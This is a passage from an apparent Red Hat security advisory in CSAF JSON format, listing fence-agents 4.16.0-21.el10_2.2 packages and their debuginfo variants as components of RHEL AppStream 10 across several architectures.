"name": "fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-eps-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-eps-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-wti-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-wti-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x"
},
